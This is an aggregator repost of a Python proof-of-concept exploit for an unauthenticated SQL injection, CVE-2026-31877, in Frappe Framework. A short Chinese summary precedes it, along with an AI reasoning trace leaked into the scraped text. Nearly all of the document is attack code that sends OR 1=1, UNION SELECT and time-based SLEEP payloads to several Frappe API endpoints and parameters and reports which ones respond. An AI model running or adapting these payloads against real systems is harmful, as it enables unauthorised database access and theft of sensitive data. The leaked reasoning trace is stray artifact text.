嗯,用户让我帮忙总结一篇文章的内容,控制在100个字以内,而且不需要特定的开头。首先,我需要理解文章的内容。看起来这篇文章是关于Frappe Framework的一个未认证的SQL注入漏洞,影响了特定版本,CVSS评分很高,达到了9.3,属于严重级别。 用户可能是一个安全研究人员或者开发者,他们需要快速了解这个漏洞的关键点。他们可能想要知道漏洞的影响范围、严重程度以及如何修复。此外,用户可能希望总结用于报告或者分享给团队成员。 接下来,我需要提取文章中的关键信息:漏洞名称、影响版本、CVSS评分、漏洞类型、利用方式以及修复版本。然后将这些信息浓缩到100字以内,确保简洁明了。 可能会遇到的问题是如何在有限的字数内涵盖所有重要信息而不遗漏关键点。因此,我需要选择最核心的信息进行总结。 最后,确保语言准确且符合用户的要求,不使用任何特定的开头词。 </think> Frappe Framework 存在未认证 SQL 注入漏洞(CVE-2026-31877),影响 14.99.0 和 15.84.0 以下版本。攻击者可通过未正确 sanitization 的 API 端点提取敏感数据库信息。修复版本为 14.99.0 和 15.84.0。 2026-3-14 22:34:17 Author: cxsecurity.com(查看原文) 阅读量:6 收藏
Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection
#!/usr/bin/env python3 # Exploit Title: Frappe Framework Unauthenticated SQL Injection # CVE: CVE-2026-31877 # Date: 2026-03-11 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://frappeframework.com # Software Link: https://github.com/frappe/frappe # Affected: Frappe Framework <14.99.0 and <15.84.0 # Tested on: Frappe Framework 15.x (vulnerable versions) # Category: Webapps # Platform: Linux / Web # Exploit Type: Remote SQL Injection # CVSS: 9.3 (CRITICAL) # CWE : CWE-89 # Description: Unauthenticated SQL injection via improper field sanitization in certain API endpoints allows extraction of sensitive database information. # Fixed in: 14.99.0 / 15.84.0 # Usage: python3 exploit.py <target> # # Examples: # python3 exploit.py http://192.168.1.100:8000 # # Options: # # Notes: This is a template PoC. The exact vulnerable parameter/endpoint remains undisclosed in the public advisory (GHSA-2c4m-999q-xhx4). # Tests common historical Frappe injection points. Use only on systems you own or have explicit permission to test. # # How to Use # # Step 1: Run against a vulnerable instance (non-production only) print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄ ▄. ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-31877 • Frappe SQL Injection (Unauthenticated) ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import sys import requests import time import argparse def test_sqli(base_url, endpoint, param, payload): full_url = f"{base_url.rstrip('/')}{endpoint}" data = {param: payload} print(f"[*] Testing {full_url} → {param} = {payload[:60]}...") try: start = time.time() r = requests.post(full_url, json=data, timeout=12, verify=False) elapsed = time.time() - start indicators = [ "syntax error", "mysql", "sql", "near", "you have an error", "ODBC", "quoted_string", "unclosed quotation", "table", "column", elapsed > 5 ] success = any(ind in r.text.lower() for ind in indicators[:10]) or elapsed > 5 if success: print(f"[!!!] Possible SQLi – response code {r.status_code}") print(f" Time: {elapsed:.2f}s") print(f" Snippet: {r.text[:400]}...") return True else: print(f" → No obvious injection (code {r.status_code}, len={len(r.text)})") return False except Exception as e: print(f" → Request failed: {e}") return False def main(target): common_endpoints = [ "/api/method/frappe.desk.reportview.get", "/api/method/frappe.model.db_query.get_list", "/api/method/frappe.client.get_list", "/api/method/frappe.desk.query_report.run", "/api/resource/User", "/api/method/frappe.search.search_link", "/api/method/frappe.desk.form.load.getdoc", ] common_params = [ "filters", "or_filters", "fields", "order_by", "group_by", "with_parent", "parent_doctype", "txt", ] payloads = [ "' OR '1'='1", "') OR ('1'='1", "' OR 1=1 -- ", "1' UNION SELECT database(),user(),version() -- ", "'; SELECT SLEEP(5) -- ", "1' AND SLEEP(5) -- ", ] print(f"[+] Target: {target}\n") found = False for ep in common_endpoints: for p in common_params: for payload in payloads: if test_sqli(target, ep, p, payload): print(f"[+] Possible vulnerable combination:") print(f" Endpoint: {ep}") print(f" Param: {p}") print(f" Payload: {payload}") found = True if not found: print("\n[-] No injection detected with these common patterns.") print(" → Either patched / not vulnerable, or different endpoint/param.") print(" → Wait for public details or analyze source diff yourself.") if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2026-31877 Frappe SQLi PoC template") parser.add_argument("target", help="Base URL, e.g. http://192.168.1.50:8000") args = parser.parse_args() if not args.target.startswith(("http://", "https://")): args.target = "http://" + args.target try: main(args.target) except KeyboardInterrupt: print("\n[!] Stopped by user.") except Exception as e: print(f"\n[!] Fatal error: {e}")
References:
https://github.com/frappe/frappe/security/advisories/GHSA-2c4m-999q-xhx4
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh